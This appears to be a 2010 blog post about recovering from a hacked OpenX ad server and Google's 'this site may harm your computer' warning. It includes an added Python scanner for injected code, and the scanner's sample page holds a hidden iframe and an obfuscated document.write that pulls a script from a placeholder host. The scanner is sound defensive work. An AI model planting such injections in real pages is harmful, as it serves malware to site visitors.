Dealing with a “This site may harm your computer” block

by admin on August 13, 2010

Over the past 3 years or so, Google and, later, Firefox (which draws on Google's Safe Browsing data) began taking a more active role in the fight against sites distributing malware by warning users before letting them through to a site that has been detected as a possible threat.

I know this because… I had several of those sites.

Not on purpose, of course – it turns out my ad server (I use OpenX to manage banners and other stuff across multiple websites, which makes a lot of things easier) was hacked this week and someone inserted some nastiness into the ad delivery code for several banners.  The original ads still appeared, but other hidden stuff also got loaded that, presumably, posed a threat to some browser/operating system combinations.

The impact

So what happens when you get flagged?  Your search engine rankings don’t change, at least not right away, but there is a “this site may harm your computer” warning that appears under the page title in the search results, and you’re treated to an interstitial warning if you click through anyway.  If you’re using Firefox, it’s even more disruptive, with a big red box showing up before you’re able to proceed:

[Image: Firefox attack site warning]

See the little "ignore this warning" link in the corner? Yeah, neither did your visitors.

Of course, you’ve got a loyal fanbase for your site, and they’re not going to trust some computer warning over you, right?  Yeah… About that:

[Image: attack stats]

Discovery

The affected sites aren’t commerce sites, and the ads don’t see enough traffic for me to obsess over daily stats reports, so in theory this could have gone on for a while before I found out about it.  Thankfully, I’ve got users and Google to help me there.  More on Google in a moment, but it’s really valuable to have a good relationship with your site’s recurring users and have a clear way for them to get in touch with you.  I received multiple emails about the problem, which was useful, since I don’t Google myself unless I’m doing SEO work (not this week) and I don’t use Firefox as often as I use Safari.

As I hinted earlier, you can actually get Google to tell you when this happens, but for that you need to tell them a bit about your sites first:

Google Webmaster Tools

Google has a really helpful tool for this kind of thing (and some other stuff too) called Google Webmaster Tools.  I don’t know where the link is for this, but rather than link to it I’ll just tell you how I always get to it: I Google it.  (Aside: a lot of Google’s services work this way, and it took me a long time to realize that this is probably on purpose, them being a search engine and all.)

You’ll need to register your sites with them, which means verifying ownership by uploading a file to your server or adding a DNS record (pretty much the same system as with Google Analytics), and once you’ve done that you can see alerts about malware along with a bunch of interesting search engine metrics and crawler reports that deserve a separate post.

More importantly, you can set things up so Google emails you these reports automatically and you don’t have to log into the system every day to make sure you haven’t been hacked.  I hadn’t done this, so again, thanks to my users!

Fixing the holes

Before you try to restore your reputation, it’s vital that you fix the problem that got you into this mess, and that starts with identifying the injected code.  The report from Google is actually helpful in narrowing this down, specifying which pages carry the attack code and which URLs it points to.  One caveat: check the page as it is actually served, not just your files on disk, since injected code can live in a database-driven component (an ad server, for instance) and only appear in the rendered output.  In my case, I was able to walk through the rendered page code and find the attack, which happened to be right next to my banner delivery code.

This is a whole other post, because it’s really interesting, but for now, let’s just say I was able to clean things up and plug the hole in the fence that let the attacker through, and then I looked at the page again to ensure that the attack code was no longer showing up.
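Walking a rendered page by hand works for one site; for several, a small scanner helps. The following is an added example, not the author's code or anything from OpenX: a Python script that parses rendered HTML and flags the patterns this kind of injection typically leaves (frames or scripts loaded from hosts outside an allow-list, hidden or 1x1 iframes, and inline scripts built from escaped strings). The allow-list, the heuristics, and the sample page with its bad-host.invalid placeholder are all assumptions constructed for the example.

```python
import re
from html.parser import HTMLParser

# Hosts the site legitimately loads scripts, frames and images from.
# Assumption for this example: adjust to your own domains and ad server.
ALLOWED_HOSTS = {"www.example.com", "ads.example.com"}

# Heuristics for injected payloads: hidden/zero-size frames and inline
# scripts built from escaped strings. These are common patterns, not a
# complete signature set.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
OBFUSCATION = re.compile(
    r"\beval\s*\(|\bunescape\s*\(|String\.fromCharCode|\\x[0-9a-f]{2}", re.I)
HOST_RE = re.compile(r"^(?:https?:)?//([^/:?#]+)", re.I)


class InjectionScanner(HTMLParser):
    """Collects (line_number, description) findings while parsing."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_buf = []
        self._script_line = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        line = self.getpos()[0]
        if tag in ("iframe", "script", "img", "object", "embed"):
            m = HOST_RE.match(a.get("src") or "")
            if m and m.group(1).lower() not in ALLOWED_HOSTS:
                self.findings.append(
                    (line, f"{tag} loads from non-allow-listed host {m.group(1)}"))
        if tag == "iframe":
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if tiny or HIDDEN_STYLE.search(a.get("style") or ""):
                self.findings.append((line, "hidden or zero-size iframe"))
        if tag == "script":
            # Script bodies arrive via handle_data, possibly in pieces.
            self._in_script = True
            self._script_buf = []
            self._script_line = line

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            if OBFUSCATION.search("".join(self._script_buf)):
                self.findings.append(
                    (self._script_line,
                     "inline script uses eval/unescape-style obfuscation"))
            self._in_script = False


def scan_html(html):
    """Return a list of (line, description) findings for one rendered page."""
    parser = InjectionScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: a legitimate ad tag followed by an injected hidden
# frame and an escaped document.write. bad-host.invalid is a placeholder.
SAMPLE_PAGE = """<html><body>
<h1>Welcome</h1>
<script src="http://ads.example.com/delivery/ajs.php?zoneid=3"></script>
<p>Site content here.</p>
<iframe src="http://bad-host.invalid/in.php" width="1" height="1" style="display:none"></iframe>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A//bad-host.invalid/x.js%22%3E%3C/script%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for line, what in scan_html(SAMPLE_PAGE):
        print(f"line {line}: {what}")
```

Feed it the HTML your server actually returns (fetch it with the same user agent Google's crawler uses, since some injections only fire for certain visitors), and treat every hit as a place to look rather than a verdict: a legitimate third-party widget will also trip the host check until you add it to the allow-list.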

Clearing your name

Google’s webmaster tools let you request a malware review.  It’s basically a button you click, followed by a confirmation that you’ve actually fixed the problem.

Google’s form claims it takes 24-48 hours to clear the warning, but in my case it was less than 12, which was pretty spiffy.

…And we’re clear – for now

Amazingly, this was the first time I’ve had to deal with this kind of thing myself (I’ve consulted on a few attacks for clients in the past.)  Was it avoidable? In hindsight, yes, but I’ve seen it happen to enough smart people to know that it’s not something I’m going to be terribly embarrassed about.  Security has a cost, and every site has its own resource budget.  For my personal sites, I’m going to spend some time defending my reputation, but I’m also going to spend more of my energy writing secure code for clients – I actually learn a lot from the forensics on these types of things, so while this was a hassle, it’s not like I walked away empty handed.

If nothing else, I’ve got a new justification for secure code when clients just want the quickest work possible: if your site has a security flaw, Google might block you.  Phrases like “SQL injection” might not mean much to the average business owner, but losing 80% or more of your daily traffic, and the accompanying revenue, certainly does.
